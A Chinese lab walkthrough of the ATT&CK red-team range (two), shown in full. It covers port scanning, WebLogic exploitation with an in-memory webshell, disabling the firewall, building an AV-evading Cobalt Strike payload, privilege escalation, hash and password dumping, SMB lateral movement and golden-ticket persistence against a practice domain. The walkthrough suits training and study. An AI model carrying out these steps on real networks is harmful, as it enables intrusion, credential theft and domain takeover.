ATT&CK实战系列——红队实战(二)打靶
环境
看视频
渗透测试
目标扫描
服务扫描
目标IP为192.168.111.80
。先简单ping
一下
无法ping通,对方有防火墙设备。使用不进行主机发现的端口扫描
1 | sudo nmap -sTVC -Pn -O 192.168.111.80 |
得到信息有:
- 80端口开启
- 服务:http
- 服务版本:Microsoft IIS httpd 7.5
- 135端口开启
- 服务:msrpc
- 服务版本:Microsoft Windows RPC
- 139端口开启
- 服务:netbios-ssn
- 服务版本:Microsoft Windows netbios-ssn
- 445端口开启
- 服务:microsoft-ds
- 服务版本:Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
- 1433端口开启
- 服务:ms-sql-s
- 服务版本:Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
- 3389端口开启
- 存在域:DE1AY
- 主机名:WEB
- DNS域名:de1ay.com
- 7001端口开启
- 服务:http
- 服务版本:Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
对方OS为Windows Server 2008 R2 Standard 7601 Service Pack 1
漏洞测试
先看看有没有漏洞能利用
1 | searchsploit Windows Server 2008 R2 |
得到永恒之蓝漏洞,用MSF试试。结果失败了,感觉是被防火墙拦了。
Web渗透
80端口
先看看80端口
1 | ┌──(kali㉿kali)-[~] |
没东西?试试目录爆破。
1 | [20:20:21] 403 - 312B - /%2e%2e//google.com |
没啥有用的东西
7001端口
看一下内容
试一下目录爆破,得到如下内容
1 | [20:26:59] 200 - 49B - /bea_wls_internal/ |
测试后得到:
目录 | 说明 |
---|---|
/bea_wls_internal/ | 啥也没有 |
/bea_wls_deployment_internal/DeploymentService | 啥也没有 |
/bea_wls_internal/HTTPClntRecv | 啥也没有 |
/bea_wls_internal/iiop/ClientRecv | 啥也没有 |
/console/login/LoginForm.jsp | 登录以使用 WebLogic Server 域 |
/uddiexplorer/ | WebLogic UDDI Explorer |
/uddi/uddilistener | Your message reached this servlet via HTTP GET. You must use HTTP POST to send your message. |
/wls-wsat/CoordinatorPortType | Web Services |
得到一个版本信息WebLogic Server 版本: 10.3.6.0
。
WeblogicTool漏洞利用
使用WeblogicTool
扫描
使用内存马注入,我这里用的是冰蝎内存马,用哥斯拉也可以,不过你要是用蚁剑的话,需要对蚁剑的源码进行一下小小的修改,这里图省事儿用的冰蝎
使用冰蝎连接
成功Getshell
跳板机
当前登录用户查看
1 | C:/Oracle/Middleware/user_projects/domains/base_domain/ >whoami |
当前登录的是de1ay域下的web用户
主机用户发现
1 | C:/Oracle/Middleware/user_projects/domains/base_domain/ >net user |
存在两个有用的用户
- de1ay
- Administrator
当前用户
尝试关闭防火墙
1 | C:/Oracle/Middleware/user_projects/domains/base_domain/ >netsh advfirewall set allprofiles state off |
主机任务查看
1 | C:/Oracle/Middleware/user_projects/domains/base_domain/ >tasklist |
发现一个数字卫士。
系统信息查看
1 | C:/Oracle/Middleware/user_projects/domains/base_domain/ >systeminfo |
得到IP
- 外网IP:192.168.111.80
- 内网IP:10.10.10.80
- 外网IP:192.168.105.150
是一个64位的系统,只打了三个补丁。
CS木马免杀上线
之前的一个python shellcode反序列化免杀脚本
这里得到了一个经过免杀处理的CS木马。这段是真难受啊,python版本需要用python6
的,pyinstaller版本要用5.0.0
的,参数为pyinstaller --clean --win-private-assemblies -F '.\exp.py'
。
可算上线了!
内网渗透
信息收集
已知
- de1ay域
- 跳板机
- 主机名:
web\de1ay
- 外网IP:192.168.111.80
- 内网IP:10.10.10.80
- 外网IP:192.168.105.150
- 主机名:
- 跳板机
跳板机IP信息
1 | shell ipconfig /all |
得到
- de1ay域
- 域名:de1ay.com
- 跳板机
- 主机名:WEB
- 外网IP:192.168.111.80
- 内网IP:10.10.10.80
- 外网IP:192.168.105.150
- 域控
- 内网IP:10.10.10.10
- 跳板机
域内主机查看
1 | net view |
没出结果
跳板机提权
我们上面知道,这台电脑只打了三个补丁,所以提权的难度不算太大,直接MS14-058
提了
跳板机Hash凭据
1 | hashdump |
得到
1 | Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: |
查看一下明文
1 | logonpasswords |
得到
1 | * Username : de1ay |
域内主机扫描
1 | portscan 10.10.10.0-10.10.10.255 1-1024,3389,5000-6000 arp 1024 |
得到信息
- de1ay域
- 域名:de1ay.com
- 跳板机(GET)
- 主机名:WEB
- 外网IP:192.168.111.80
- 内网IP:10.10.10.80
- 外网IP:192.168.105.150
- 域控
- 主机名:DC
- 内网IP:10.10.10.10
- 开放端口:636、593、464、389、139、135、88、53
- 域成员
- 主机名:PC
- 内网IP:10.10.10.201
- 开放端口:5357、5040、912、902、139、135
- 跳板机(GET)
横向移动
SMB横向移动
尝试SMB横向移动,但是,现在我们没有得到域控的账号密码。默认账号是administrator
,密码现在知道了两个,1qaz@WSX1
和1qaz@WSX
。挨个试碰运气吧
1 | administrator/1qaz@WSX1 --> FAIL |
拿到域控,一样的方法拿另一台主机
全部拿到。
权限维持
krbtgt凭证
成功得到域控。在域控下拿一下hash
1 | hashdump |
得到krbtgt凭据
SID
1 | logonpasswords |
拿到SID
1 | SID: S-1-5-21-2756371121-2868759905-3853650604-1001 |
黄金票据
直接远程连接dir域控c盘
1 | shell dir \\10.10.10.10\c$ |
成功。